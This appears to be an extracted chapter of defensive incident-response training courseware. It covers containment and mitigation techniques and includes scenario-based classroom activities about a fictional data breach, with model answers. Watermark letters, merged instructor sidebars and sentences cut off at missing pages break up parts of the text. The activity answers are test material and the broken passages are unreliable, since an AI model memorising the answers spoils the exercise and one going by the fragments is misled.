N
Incident responders can leverage IAM to quickly contain and mitigate attacks that use accounts and
other identity components as vectors. For example, a rogue account can quickly be deprovisioned to
lock an attacker out of a targeted system.
IAM Solutions
There are many IAM solutions. Most IAM services offered through cloud platforms have a similar
set of features, including many of those listed previously. The following are some common
examples.
• AWS Identity and Access Management is part of the Amazon Web Services® cloud platform.
e
• Microsoft Azure Active Directory is part of the Microsoft® Azure® cloud platform.
ut
• Google Cloud Identity and Access Management is part of Google Cloud Platform™.
• IBM Identity and Access Management is part of IBM® Cloud.
ib
• Oracle Identity Cloud Service is part of Oracle® Cloud Platform.
Some IAM solutions that are not specific to the cloud include:
tr
• SolarWinds Access Rights Manager, which enables an organization to manage and audit
access rights in an Active Directory® environment.
is
• The Protected Users group in an Active Directory environment, which disables potential attack
vectors used in authentication for any users assigned to this group. For example, credentials are
not cached locally, so the user must be able to connect to the domain controller in order to sign
D
in. Other potential vectors, like NTLM and long-term Kerberos keys, are also either disabled or
reduced in functionality.
• The group Managed Service Account (gMSA) in an Active Directory environment, which
or
enables the Windows operating system to manage the password of a single security principal
account used by multiple instances of a service, rather than requiring an administrator to manage
the password. This makes it easier for each service instance to synchronize with a single identity,
e
keeping each individual instance opaque to the authenticating user.
at
Patch and Update Patch management, also called update management, ensures the timely and consistent
Management collection, evaluation, testing, and deployment of software fixes. Vendors update operating systems,
applications, device drivers, and firmware on a regular basis to address known vulnerabilities. It is
up
critical to keep your software and hardware updated to take advantage of these improvements.
Attackers may target these vulnerabilities, knowing some organizations may be slow to remediate
them.
Patch management is an essential countermeasure in both the preventative and responsive sense:
D
you patch your critical software to eliminate security vulnerabilities attackers can exploit, while also
patching software to stop an ongoing exploit or recover from the effects of an exploit that's already
concluded. Whether you're updating high-level desktop application software or low-level device
ot
firmware, your management program needs to consider the scope of the changes, including how
many devices or environments require the patch and what kind of downtime, if any, applying the
N
patch will require. You should also identify more attributes about the patches themselves, like where
they come from, how they function, and what vulnerabilities they are meant to fix, so you'll be
better informed.
o
As you update your systems, be sure to also update any policies, procedures, configurations, and
monitoring references (or baselines) that may be affected.
D
e
ut
ib
tr
is
D
or
e
at
If the organization establishes MDM before an incident, first responders can use the administrative
lic
console in a number of ways to mitigate incidents that affect mobile devices. For example, if a
manager's phone is misplaced or stolen and contains sensitive company information, the CSIRT can
remotely wipe the device from the MDM console. Likewise, the responders will have an easier time
up
locating the device if it's transmitting GPS coordinates. If malware that targets mobile OSs finds its
way onto employees' devices, the CSIRT can quickly push out patches to every device once the
vendor makes the patches available. These are just some examples of how an MDM process can
harden the often-overlooked security of mobile devices during an incident.
D
Physical Security
ot
Physical security is also an important domain for designing and deploying countermeasures. In some Physical Security
organizations, personnel from a Facilities department may be in charge of physical security, distinct
N
from the IT security group; however, more and more organizations are combining physical security
responsibilities and technical and administrative responsibilities under one domain. In doing so, the
CSIRT is kept better informed and has more access to tools and techniques that could help them
o
There are many physical security controls the incident responder might employ or at least be aware This is not an exhaustive
of. Some major examples include: list, and a deeper dive
into physical security is
• Barriers, including fences, walls, doors, and windows. beyond the scope of this
• Locks, including key locks, deadbolts, combination locks, access card locks, and biometric locks. course.
• Storage, including containers, safes, and vaults.
• Surveillance, including security cameras and audio recording equipment.
• Alarms, including lights, bells, sirens, and local or remote console alerts.
System Hardening
System Hardening System hardening is the process by which a host or other device is made more secure through the
Consider pointing reduction of that device's attack surface. Hardening is most effective as a preventive measure when
students to https:// designing system security, but this is not always feasible given the constraints of time, money, and
www.cisecurity.org/cis- the need for convenience. However, hardening can be useful after an incident has occurred to shut
e
benchmarks/ for more down any lingering effects or purge a system of an infection. Hardening can also remove and
ut
system hardening best prevent further unauthorized users from accessing compromised systems.
practices.
There are many potential approaches to hardening, each of which may be better served in certain
contexts. The following are some examples:
ib
• Deactivate unnecessary components, including hardware, software, network ports, operating
system processes and services, and applications. When not in use, these components may slip by
tr
your detection, enabling an attacker to stealthily use them as a vector or target of an attack.
• Disable unused user accounts. Accounts like the system's defaults or those of terminated
is
employees are more potential vectors that can go unnoticed.
• Strengthen authentication methods, like enforcing multi-factor authentication and strong
D
password requirements.
• Apply hotfixes and other patches that will enable you to quickly correct system vulnerabilities.
• Restrict host access to peripheral protocols like Universal Serial Bus (USB) and Bluetooth.
or
Attackers with physical access to systems can easily bypass many security measures if they can
simply plug in a USB drive loaded with malware.
• Restrict shell commands per user or per host for least-privilege purposes. Having shell access can
give the attacker a great deal of power over a system, so it's best to reduce its functionality if
e
affected by an incident.
at
Isolation
lic
Isolation One of the most crucial mitigation strategies you can employ for almost all types of incidents is
isolation. Isolation involves removing an affected component from whatever larger environment it is
a part of. This can be everything from removing a server from the network after it has been the
up
target of a DoS attack, to placing an application in a sandbox virtual machine (VM) outside the host
environments it usually runs on.
Whatever the circumstances may be, you'll want to make sure there is no longer an interface
D
between the affected component and the outside world. The most obvious reason has to do with
malware infections, particularly fast-spreading worms and viruses. If a server infected with a worm is
still connected to the rest of its subnet, the worm could easily make its way to other hosts on that
ot
subnet. Disconnecting the server could mean the difference between disinfecting hundreds of
devices and just one. Beyond literally pulling the plug on a server, you can also move it to a new
subnet to logically segment it from the rest of the network. Another method of server isolation is to
N
use a jump box—a hardened host from which authorized personnel access other hosts in a trusted
security zone. If the jump box is truly secure, moving affected systems behind it will help contain
further compromise from attackers.
o
Applications you suspect may be the vector of an attack can be much less effective to the attacker if
D
the application is no longer running on workstations or servers in normal production mode. The
app can be isolated to remove that point of compromise by moving it to a new host or a VM guest
running on that host.
e
ut
ib
tr
is
D
or
Figure 10-3: Isolating a compromised server on a different subnet through network
segmentation.
e
Honeypot
at
A honeypot is a practice that traps attackers in an isolated environment where they can be
monitored and kept from compromising systems in production. The honeypot tricks the attacker
into believing they are causing actual damage to a system, which enables the security team to analyze
lic
the attacker's behavior. This can help the security team identify the source of the attack, and take
more comprehensive steps to completely eradicate the threat from the organization. For example, an
organization constructs a database full of benign or meaningless data disguised as important
up
financial records. The organization places the database behind a subnet with lowered defenses,
which baits an attacker into attempting to exfiltrate this useless data.
Bastion Host
D
A bastion host is an alternative to a jump box that segments and isolates network resources for the Bastion Host
ot
purposes of securing access. Whereas a jump box is a hardened server within the security zone the
user is trying to access, essentially making it a bridge between two separate security zones, a bastion
host connects a trusted zone to a trusted zone or an untrusted zone to a trusted zone. It does not
N
enable direct access to a trusted zone, but it does provision resources and services from within the
trusted zone to external users or devices.
The bastion host is therefore a single point of attack from which users from untrusted networks like
o
the Internet can access resources and services that need to be kept isolated and secure. The
organization can more easily protect, maintain, and monitor this system they expect to be attacked.
D
Bastion hosts are usually firewalls, DNS servers, email servers, web servers, or any other type of
server that faces a public network. These hosts provide specific services to users.
Consider the following analogy: A jump box is like a guard for your main office building. When
someone from a branch office visits, they must be granted access by the guard before they can enter.
Once inside, the visitor has access to the building, though not necessarily total access if other
security controls are in place. Now, consider that a bastion host is like a bank teller. A customer
wants to withdraw money from the bank. The teller provides this service for the customer, and the
customer is never granted access to the bank vault itself.
e
ut
ib
Figure 10-4: A bastion host sits outside the internal network and can provision resources to
users making requests from external networks like the Internet.
tr
Blacklisting
is
Blacklisting Blacklisting is the process of blocking known applications, services, traffic, and other transmissions
to and from your systems. Blacklists, also called block lists, are created when the organization knows
D
the source or mechanism of a potential threat and determines this threat can be shut out from the
organization entirely.
Blacklists are useful in incident response for their ability to block the source of malware. The source
or
can be external to the organization, or it can be positioned internally through persistence techniques
like rootkits and logic bombs. As an example of an external source, consider that the users in your
organization are having their workstations infected by malvertisement on seemingly legitimate
e
websites. The advertisements are not necessarily localized to one site, so it may not be effective to
simply prevent users from visiting one particular site. Instead, you can implement ad blocking or
at
script blocking software on the user's workstations, or adjust your organization's web filter to block
URL requests for known advertisement domains. Constructing a blacklist of domains, sites, or
technologies that can be a vessel for malware will help stop an infection from spreading.
lic
As an example of an internal source of malware, assume that you've uncovered evidence of logic
bombs going off under unknown circumstances. You do know the effect (encrypting the user's drive
to use as ransom), and you know how it spreads—through several different TCP/IP ports. So, your
up
blacklist could include the port numbers you know the logic bomb uses to spread, and if you
implement the blacklist at the firewall, you can help prevent more hosts from being infected.
D
Limitations
There are two main limitations of blacklists. The first runs the risk of false positives, in which you
block a site, service, port, and so on, that actually has legitimate uses. This can end up being a sort of
ot
collateral damage in an attempt to defend against a malware attack with many vectors or vectors
commonly used in normal operations. The other main weakness of blacklisting is everything that
you don't know. You can't possibly know every single malicious attack vector out there, and the
N
ones on the list might not be comprehensive enough. You're essentially running the blacklist from a
limited perspective, one that can't possibly catch up to the ever-changing world of malware and
other threats.
o
D
Whitelisting
Whitelisting Whitelisting is a response to the blacklist's problem of what you don't know. In a whitelist, also
called an allow list, you block everything except what you trust. In the external malvertisement
example, you could create a list of advertisement domains you know to be legitimate, and filter out
the rest. It's much easier to account for what you know is safe or acceptable.
In response to an ongoing incident, whitelisting may be the better alternative when confirming and
researching malicious sources of malware that are either too time consuming or too subject to
change. You're much more likely to know right away what's friendly than to spend time identifying
every possible foe. You may have missed a port that the logic bomb uses to communicate, and that
your blacklist doesn't account for. That will enable the infection to spread, despite your efforts. If
you enforce a whitelist of all legitimate ports, however, then this unknown port would likely have
been blocked.
Whitelisting is also useful in keeping a list of applications that a host can install, or a network
address it can communicate with. If a user's workstation needs only a word processor, a spreadsheet
e
program, and not much else, then all other software (including malicious software) can default to
ut
being blocked while the CSIRT contains and mitigates the incident.
Limitations
ib
Whitelists are usually a safer bet in incident mitigation, but they're not flawless. They can be
incredibly restrictive, preventing users and systems from transmitting data to new or changing
tr
recipients. They need to be constantly fine tuned to avoid interference with business operations,
which can be cost prohibitive and time prohibitive for some organizations.
is
Note: To summarize, whitelisting is preferred as the default preventative tactic, whereas
blacklisting is best used as a reactive tactic when you know the specific sources of an incident.
D
DNS Filtering
or
As you've seen, one of the mechanisms involved in blacklisting and whitelisting is filtering. Domain
Name System (DNS) filtering, also called web filtering, is the process of restricting what kind of
lookup requests are validated within an organization. The typical DNS process translates a common
DNS Filtering
e
site name into an IP address and returns it to the user making the request. If you place a filter on
your DNS, however, the DNS lookup can be halted if it detects a name/IP address on its filter
at
(blacklist) or not on its filter (whitelist). Instead of returning the untrusted site to the user, the filter
will usually redirect them to a local server with a block message.
lic
up
D
ot
N
o
D
e
ut
ib
tr
is
D
or
e
Figure 10-5: A DNS filter has blocked a user from viewing an untrusted site.
at
During an incident, a DNS filter can help prevent users from downloading more malware onto their
systems and increasing the incident's magnitude. Filtering at the DNS level is easy to apply
organization wide and can save you from scrambling to each and every workstation to apply your
lic
mitigation locally. It won't remove an infection or mitigate other types of incidents, but it's an
effective method of malware containment nonetheless. However, it's important to note that, if users
don't actually use your DNS servers for lookup, they may be able to bypass filtering.
up
Black Hole Routing In network architecture, a black hole drops traffic before it reaches its intended destination, and
without alerting the source of this. A simple example is traffic that is sent to an IP address that has
been mapped to a non-existent host. Since the destination does not exist (the figurative black hole),
ot
the inbound traffic is discarded. In order for the source not to be alerted about the discarded traffic,
it must transmit the traffic using a connectionless and unreliable protocol like User Datagram
Protocol (UDP), rather than a protocol like Transmission Control Protocol (TCP) that attempts to
N
verify delivery.
Like DNS filtering, you can use black holes in conjunction with blacklists/whitelists to filter out
o
unwanted traffic sources that may contain malware. However, a more common and effective way to
use black holes is by dropping packets at the routing layer to stop a DDoS attack. Using a Cisco
D
router, for example, traffic can be sent to the null0 interface. This interface automatically drops all
traffic. If you know the source address range(s) of a DDoS attack, you can silently drop that traffic
by configuring the router to send the attacking range(s) to null0.
Black hole routing may be more beneficial than other methods of traffic filtering because it tends to
consume fewer router resources. Processing overhead for implementing firewall rules or DNS
filtering is much higher, and when you're trying to mitigate a DDoS attack, every bit of bandwidth
helps. It's extremely important, however, for you to recognize the high potential for collateral
damage in routing entire IP address ranges into black holes. The most successful DDoS attacks
launch from disparate IP addresses—addresses that are in ranges shared with many legitimate users.
Blocking an entire range to stop just a handful of sources may, ironically, end up denying your
services even more.
e
ut
ib
tr
is
D
or
e
at
lic
mechanisms from a device. Situations like these may call for secure erasure through a process
known as sanitization. Sanitization is the act of thoroughly and completely removing all data on a
storage device so it cannot be recovered. This thoroughness is essential, as there should be no data
N
remnants that persist on the device that could lead to continued compromise.
You can sanitize a drive at the software level using various forensic applications, or you can connect
a forensic hardware device to bypass the operating system. In either case, sanitization tools typically
o
overwrite all data on a drive with random or all zero bits. This prevents other tools from extracting
and reconstructing meaningful data from the drive, as this data has been replaced by entirely
D
meaningless information. You can also sanitize a drive through degaussing, in which a strong
magnetic force is applied so the drive loses its magnetic charge, scrambling the data and rendering it
unreadable.
Note: On modern drives, degaussing may be destructive to the drive itself.
Degaussing works only on media that store data magnetically, like hard disk drives. Solid-state drives
(SSDs) cannot be degaussed. You also cannot reliably write zeros to an SSD and expect it to erase
the data; this is because, unlike hard drives, SSDs do not simply overwrite old data with new data.
Instead, SSDs mark a page on the drive as invalid so the operating system knows not to access it;
the data on the page remains until the SSD determines it needs more space and erases the data on
the page. Some SSD manufacturers provide firmware utilities for securely erasing data on SSDs, but
those utilities tend to only work on devices from that manufacturer.
True sanitization is destructive to the virtual data, not the storage medium itself. This enables you to
reconstruct and reimage the drive after it is sanitized, using a known clean backup you created prior
e
to the incident. However, in some cases, you may not be confident that an infection has been
ut
eradicated until the storage medium itself is destroyed. Disposing of this compromised hardware
typically involves physically destroying the device through force, such as through crushing the drive
or shredding it into many pieces. Degaussing techniques can also destroy a drive by removing servo
ib
control data that is written to the drive when it is manufactured. Corrupted servo control data
cannot be fixed and will make it impossible for the drive to determine where to read/write data on
the magnetic media.
tr
Sanitization Through Encryption
is
One alternative to employing direct secure erasure methods is to encrypt the drive using full drive
encryption (FDE). As long as the drive undergoes FDE before any sensitive data is put on it, and
D
you destroy the encryption key, then you will be able to safely reuse the drive without being able to
access the original plaintext data. Microsoft's BitLocker® is a common example of an FDE solution.
or
Devices and Tools Used in Prevention, Containment, and
Mitigation
e
Devices and Tools Used You should be familiar with the devices and tools in the following table, but you should also
in Prevention, consider how they can be used to help you address cybersecurity incidents in addition to their
at
Firewalls Firewalls can perform some of the most rudimentary traffic filtering
processes on your network. They can use both whitelists and blacklists to
up
block certain ports you've identified as vectors for a current attack. More
advanced firewalls, like web application firewalls (WAFs), can block
unwanted traffic at higher layers, offering you greater control over what
type of traffic you intend to block.
D
and characterize. Even though you may already know you're under attack,
an IDS/IPS can reveal additional targets of the attack that you may have
originally ignored. It can also help you detect and stop an attack whose
N
e
channels, or other holes in your security that attackers exploit in an
incident.
ut
Routers and switches As previously discussed, routers can be useful in creating black holes for
DoS traffic to be discarded. Many modern routers also have basic firewall
ib
functionality, meaning they can block unwanted traffic communicating
over certain ports and protocols. Switches are also a common component
for establishing subnets. These subnets can isolate compromised devices
tr
while still affording them a network connection.
Proxies Web proxy servers can be used as a method of content filtering. A user
is
must pass through the proxy to connect outside of the private network,
and the proxy can block the user from being exposed to malicious traffic.
D
On the other hand, reverse proxies can respond as an intermediary for
the server that the attacker is contacting. The actual server stays hidden,
while the reverse proxy server takes on any inbound malicious traffic.
Virtual machines
or
When it comes to mitigating a malware infection, you can isolate and
analyze the malware in a virtual environment. In addition, a server
infrastructure spread among many distributed VMs, as in a cloud
e
architecture, may be able to more efficiently handle excessive traffic load
and minimize downtime in a DoS attack.
at
Desktops Desktops are the platform from which you'll use the incident response
tools of the trade. Desktops may also temporarily host VM environments
lic
your employees.
Servers Server infrastructure provides load balancing and data backups during
DDoS attacks and data destruction breaches. Servers are also commonly
D
intelligence.
Mobile devices The portability of smartphones, tablets, and other mobile devices may
speed up your mitigation efforts, as they are not tied to one physical
N
location like a desktop. Some rudimentary security tools are available for
mobile OSs, so you can quickly move from one affected device to
o
department) are able to interface with computing and network resources within the organization.
This usually takes the form of Active Directory Group Policy Objects (GPOs), which enable an
administrator to restrict user access in an Active Directory domain to a granular level. You can
also apply these policies to objects like Registry entries and file systems. This may help you
contain an attack that uses these objects to assume higher levels of privilege.
• Implement network access control (NAC) policies. You can restrict how hosts access
resources and services over the network—including quarantining hosts in separate virtual local
area networks (VLANs) or implementing switch port blocking entirely—based on several
factors, including:
e
• Time-based factors to keep an entity from accessing network resources based on the time of
ut
day. For example, a resource may be accessible only during business hours so that any
necessary response is more readily available.
• Location-based factors to keep an entity from accessing network resources based on where
ib
they are physically located. For example, you may not allow GPS-enabled mobile devices to
access the network if they are beyond your office's perimeter.
tr
• Other rule-based factors to keep an entity from accessing network resources if they do meet
the predefined standards. For example, you may disallow entities using a particular operating
system from accessing network resources.
is
• Role-based factors to delegate access based on the entity's function and responsibilities. For
example, you may allow access to a resource only if the requesting entity is in the
D
administrator role.
• Set up a sinkhole to reroute malicious outbound traffic from your network. Your access control
lists (ACLs), whether blacklisting or whitelisting, can identify potentially malicious external
or
domains. If a bot inside your network is attempting to contact its controller on the outside, and
this malicious domain matches your ACL rules, you can set up your perimeter firewall to forge a
DNS response to the bot that connects the domain to an IP address you specify. This is the
sinkhole, as the malicious botnet traffic cannot escape to the outside world.
e
• Establish a centralized system for managing logs. Keeping log generation and collection localized
at
to individual hosts will make it easier for an attacker to wipe the logs of a host to cover their
tracks. With a centralized system, logs will be offloaded and backed up onto a secure server that
may be outside the attacker's grasp.
lic
• Configure IDS/IPS rules to take on a more active containment role, rather than just a preventive
one. Once you've identified the vectors and mechanisms of an attack, alter your rules to trigger
alerts based on behavior that may indicate ongoing or persistent malicious behavior. You can
up
also adjust your rules to account for the possibility of an attacker varying their attack to
circumvent your detection systems. If your rules incorporate known variations on attack types,
you may be able to spot additional malicious behavior you would have otherwise missed.
D
• When necessary, implement compensating controls when typical mitigation efforts have failed.
Mitigate Incidents
When mitigating incidents:
o
• Incorporate blacklisting and whitelisting to control what sources of malware and traffic are
blocked in your organization.
• Use DNS filtering to prevent users from accessing malicious sites.
• Incorporate black hole routing to drop malicious traffic sent to the network.
• Understand how the everyday devices in your organization can help you mitigate an incident.
• Implement access control mechanisms like NAC policies, group policies, and ACLs.
• Have a plan to implement compensating controls when typical mitigation efforts fail.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 10-2
Identifying and Analyzing an Incident
Scenario
e
Now that you've collected preliminary information about the incident and drafted a plan of action,
it's time to respond. As a lead responder in Develetech's CSIRT, you've been asked to acquire more
ut
data related to the incident and analyzing that data.
Activity: Identifying and
ib
Analyzing an Incident
Use the slide to 1. You've already collected the logs on the affected research and development
summarize the incident
server.
tr
for students. This will
help them keep the
What else should you and your team collect that will help you understand
is
details fresh in their
minds. what happened?
Remind students that A: Answers will vary. The team will need to collect any network logs that list remote access events.
D
they can consult NIST The team discovered the remote IP address (67.240.182.117), but any additional information, like
SP 800-61 if they need the number of connection attempts, or any past activity by this IP address, will be valuable. On a
ideas during this activity. network level, the team should also identify any intrusion detection/prevention activity that
or
generates alerts. If the affected server has any anti-malware or HIDS/HIPS running, the team
should also consider any alerts from these as incident-related data. The team can also consult its
SIEM solution to see if any anomalous activity was detected in its log analysis duties. At this point,
the team doesn't know what, if anything, was done to the server or network. All of these tool-
e
assisted records can help them piece together the extent of the damage. Beyond technical
sources of data, others in the team should also start interviewing all relevant employees. Charles
at
needs to describe every step that he took when he tried signing in to his account, as well as who
he contacted to get that resolved, and when. The help desk employee needs to corroborate this
information. Likewise, you should confiscate Pat's workstation. It may be helpful to try contacting
lic
Pat as well and explaining the situation. Any surveillance camera footage around the time of Pat's
computer accessing the server should also be gathered. What's more, you should determine if
anyone else was in the building before 8:00 a.m. and witnessed any unusual behavior, especially
up
information will be relevant or even accurate. This could indicate that someone specifically used
this IP address because they knew it had no history that could be traced back to them; or, it might
simply mean that it was the user's first time ever accessing a remote computer in the domain from
o
that IP address.
D
3. Network access logs show that the remote connection tried to log in under
Charles' account five times. The server's event logs also confirm this. After
the fifth failed attempt, the domain's account lockout policy took effect, and
Charles' account was denied access until reset by an administrator. However,
Charles denies that he tried to log in last night.
What does this suggest happened?
A: It suggests, but does not prove, that the user was simply guessing the password to Charles'
e
account. After too many failed guesses, security measures kicked in and locked the account.
Because Charles denies he tried to log in last night, it seems unlikely that Charles himself forgot
ut
his password or mistyped it over and over again. Thus, the team can reasonably conclude that
someone attempted to use Charles' account as a way to log in to the research and development
server remotely.
ib
4. The team members ask how someone could have discovered Pat's
password. Because remembering passwords is difficult, Pat admits to writing
tr
several passwords on a piece of paper and placing it in the top drawer of the
is
desk.
What does this suggest about the role of Pat's account and workstation in the
D
incident?
A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and
5.
then used that to log in to the account at Pat's workstation.
Now, the CSIRT must ascertain what damage, if any, has occurred.
or
e
What practices should the team put in place for this important phase of the
response?
at
A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
network level and on the affected host. This will make detecting a deviation from the norm much
lic
easier. The team has already done some log correlations, but it also needs to go further and make
sure that it knows exactly what happened on the network and the host at specific times. A SIEM
solution can assist the team in doing this, if available. The team can also make their jobs easier by
up
filtering out irrelevant data they've collected, which often becomes apparent during the analysis
phase. Any alerts generated by IDSs at key times may also confirm the nature of a possible
attack, especially if any reconnaissance was done prior to the incident.
D
6. While analyzing collected data, a responder noted that nearly two minutes
after Pat's account was logged in to the research and development server
(7:45 a.m.), event logs show a removable storage device being attached to
ot
the workstation. The next related event was when the device was safely
ejected, at 7:50 a.m.
N
that workstation. It could also suggest that the person loaded something onto the server.
D
7. The research and development server was set up with an HIDS prior to the
incident. The HIDS generated an alert at 7:44 a.m indicating that several files
were copied to a host on the network, including highly confidential images
and documents related to Develetech's upcoming line of smartwatches. The
connection was terminated at 7:45 a.m. There is no immediate trace of the
files on the client destination.
What does this suggest?
e
A: It suggests that a sensitive document was quickly exfiltrated from the research and development
server and moved to a different host—most likely Pat's workstation—as it was the only account
ut
signed in at the time. The document was then deleted from Pat's workstation.
ib
8.
tr
A: Answers may vary, but essentially, you might say something along these lines: An attacker
attempted to use Charles' account to connect remotely to the internal research and development
is
server. The attacker failed. Later, in the early morning before most people made it in to the office,
the attacker physically went to Pat's desk, discovered the password written down in a drawer, and
used it to log in to the workstation and the remote server. While in the remote server, the attacker
D
transferred sensitive product files to Pat's workstation, where the attacker then copied the file to a
removable drive. The attacker deleted the file from Pat's workstation, ejected the removable drive,
and left. The organization's data has been breached.
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 10-3
Containing, Mitigating, and Recovering from an
Incident
e
Scenario
ut
Now that you've identified the basics of the incident, you must contain it to stop it from bringing
any more harm to your organization. You'll also need to wipe any potential lasting traces of the
breach from your systems to ensure the issue is resolved. The next step will be to recover the
ib
business functions that were affected by the breach so that the organization can truly return to
normal. Lastly, the CSIRT needs to conduct the post-incident task of drafting an AAR so as to help
tr
prevent such an incident from occurring in the future.
Activity: Containing,
is
Mitigating, and
1. What are some containment and mitigation strategies you'd perform on this Recovering from an
Incident
D
incident to stop a data breach from continuing or reoccurring? Use the slide to
A: Answers will vary. Some devices, like Pat's workstation and the research and development server, summarize the incident
have been collected for analysis. They should stay disconnected and isolated from the wider for students. This will
or
network in case the attacker has a backdoor communication channel into these devices. When the
CSIRT is ready, they should also perform malware scans on the isolated systems to determine if
any filtering needs to be applied to the wider network. If the attack was assisted by malware, the
team needs to block the source of that malware using whatever method they deem to be
help them keep the
details fresh in their
minds.
Consider asking
e
appropriate. Both Charles and Pat should have their domain accounts disabled for now, so the students if they think this
attacker cannot continue to use them as vectors. Network access to other servers that hold incident could result in a
at
sensitive information should also be actively monitored or completely denied, depending on how criminal prosecution,
significantly this will impact business needs. and whether they think it
will require forensic
lic
2. What likely cannot be contained by the CSIRT team as a result of this investigation.
breach?
up
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with it, they could
have distributed it in any number of ways. If the design document falls into the hands of a
competitor or is uploaded to the public Internet, it will be very difficult, if not impossible, to fully
contain the breach.
D
3. A thorough scan did not detect any malware on the affected systems. The
team has concluded that the systems are free of rootkits, keyloggers, and
ot
A: Answers will vary. Some may argue that, because the systems are both clean of malware, and the
only point of compromise at the moment is user accounts that have been disabled, it is safe to
D
push both computers back into production. However, without the full picture of the incident, it
would be premature to say there couldn't be other points of compromise that the team doesn't yet
know about. Likewise, both devices may need to be treated as evidence in an upcoming
investigation, so pushing them back out rather than keeping them quarantined would hurt that
investigation. Instead, it would be best to recover the latest backup copy of the research and
development server, put that backup image on a different machine, and use that as the live
production environment for now. The IT department can provision a temporary workstation for Pat
while the normal one is quarantined.
4. When it comes to Charles' and Pat's disabled user accounts, how will you
approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the
attacker only knew his user name, and not his password. His user name is likely common
knowledge in the company or easily guessable anyway. Therefore, anyone with access to the
research and development server could have been a target without having done anything
necessarily wrong. On the other hand, Pat's account is compromised and it needs a password
change before it can be re-enabled. However, even before that, it would be a good idea to ensure
that Pat is trained on proper end-user security practices, and should be reacquainted with the
e
company-specific policy regarding passwords and password storage. The human factor is one of
the weakest points in the security of any organization, and writing passwords down and putting
ut
them in an unlocked drawer is certainly not an acceptable practice. Until Pat has demonstrated a
willingness to comply with security policies and guidelines, the account should stay disabled.
ib
5. The situation appears to have been mitigated, and normal business
operations have been restored. A new physical machine is hosting a recent
tr
backup of the research and development server, Charles' account has been
re-enabled, and Pat will be provisioned a new workstation and required to
is
undergo security training upon returning from vacation. Now the team must
draft an AAR.
D
What lessons have you learned from this incident, what suggestions do you
have so that an incident like this is prevented in the future, and what other
content should be in the report?
or
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident
handling procedures. This includes every step, from identification and analysis, to containment
e
and eradication, and then to recovery. The report should justify the actions the team took, and, if
applicable, should admit if there were more efficient and accurate ways of handling the incident.
at
Finally, the team needs to ask itself what should change as a result of this incident. The
suggestions they put forth can be: encrypt the research and development server and every other
server that holds sensitive data; disable USB ports on certain at-risk hosts; mandate company-
lic
wide training for end users on best security practices; draft policies that mirror this training,
especially concerning best usage of passwords and the storage of those passwords; and, if
feasible, implement a DLP solution on the research and development server so that any
attempted exfiltration of data will be denied.
up
D
ot
N
o
D
TOPIC C
Hand Over Incident Information to a Forensic
Investigation
When an incident occurs, analysts may need to perform a variety of forensic activities, such as
e
collecting data and identifying evidence. As a first responder, there are a variety of tasks you'll need
to perform during and after an incident to ensure forensic analysts will be able to do their jobs
ut
effectively.
ib
The Duties of a Forensic Analyst
Computer forensic analysts are known by a variety of other job titles, such as forensic computer The Duties of a Forensic
tr
examiner, digital forensic examiner, and computer forensic detective. Forensic analysts might work Analyst
for the police or a security service, a bank, a computer security service organization, or within a
is
cybersecurity team in a large organization. They use their technology and investigative skills to
recover information from computer systems, memory, and storage, possibly working in cooperation
D
with law enforcement officials to investigate cyber crimes or extract electronic evidence related to
other types of crime, or to analyze evidence (as an expert witness, for example) to help organizations
or individuals defend themselves in a legal case.
or
Forensic analysts might be involved in investigations focusing on a wide variety of incursions or
violations such as hacking; terrorism; political, industrial, or commercial espionage; employee theft
of sensitive company information; online fraud; and illegal pornography. Forensic analysts may also
be called upon by IT technology or security groups to assist in planning IT systems and processes to
e
ensure that evidence will be properly handled during a cybersecurity incident.
at
As part of a CSIRT, the forensic analyst may play a number of roles following a security incident or
in general support of cybersecurity, such as:
lic
• Investigating and reconstructing the cause of a cybersecurity incident, which might include tasks
in any or all phases of the forensic process: collection, examination, analysis, and reporting.
• Investigating whether any crimes, compliance violations, or inappropriate behavior has occurred.
up
• Following forensic procedures to protect evidence that may be needed if a crime has occurred.
• Determining if sensitive, protected data has been exposed.
• Contributing to and supporting processes and tools used to protect evidence and ensure
compliance.
D
incident. Remember your purpose as an incident responder is to return your operations to normal, CSIRT Outcomes to
whereas forensic personnel are concerned with gathering evidence to use in the possible prosecution Forensic Analysts
D
of a crime. However, while restoring operations, you will undoubtedly take note of attacks and Point out to students that
vulnerabilities that you identify in the process. This information may be vital to a forensic the transition from
investigation, and failing to present it to the forensic team may impede their efforts. incident response to
forensic investigation is
One of the first goals of this collaboration is to actually determine if a forensic investigation is not necessarily a linear
warranted. This determination should be supported by strong policy: What sort of monetary loss or process; the actions of
theft of property should be considered actionable? Does your policy also include an evidence both teams are often
intertwined.
threshold the investigation needs to meet to be viable? You may not be the one to make this
decision, but the decision may depend on your findings during an incident.
Consider the following when communicating your incident outcomes to the forensic team:
• Designate a liaison who can be the forensic team's point of contact. This contact will do all of
the communicating with the forensic team. This way, your CSIRT will have a single, authoritative
voice with which to communicate your results, rather than fragmented and possibly
contradictory voices.
• Make sure the forensic team has a good idea of the scope of the incident. They need to know
e
what assets were affected and what business processes were disrupted. You may not know all of
this, but anything you can give the team is important.
ut
• Detail all the individual physical and virtual assets you believe were affected by the incident. Also
explain why you think each particular asset was affected.
ib
• Detail when and how malware was quarantined to stop its spread in the network. The forensic
team can use this quarantined malware as evidence.
• Describe any containment, mitigation, or recovery procedures performed on devices. If there is
tr
no one-to-one copy of a drive or other device, the forensic team may need to rely on the affected
system as evidence. Being able to separate incident response actions from malicious ones will
is
make it easier for the team to identify the relevant information.
• Explain to the forensic team the tools you used to respond to the incident. What does each one
D
do? Can you think of any issues they may present to the evidence collection process? Using the
malware example previously mentioned, what if your anti-malware solution deletes malware
outright, rather than risk quarantining it?
or
• Give what information you can about the timing of each event in the incident. When did you
first notice the incident? When did you begin your response? When did you start and finish your
containment/mitigation/recovery efforts? The timings are often automatically generated through
logs and other event reporting solutions, but you may need to provide some timeline information
e
manually.
at
Guidelines for Handing Follow these guidelines when you hand over incident information to a forensic investigation.
Over Incident
up
• Review any existing policy that guides you in handing over results to a forensic team.
• Establish meetings with other teams, including the forensic team, to determine how to share
ot
information.
• Determine who should be the point of contact for ongoing collaboration between teams.
• Set expectations that forensic investigators may need to interview members of the CSIRT during
N
their investigation.
• Discuss what you need from the other teams (information, equipment, etc.), and what they need
from you.
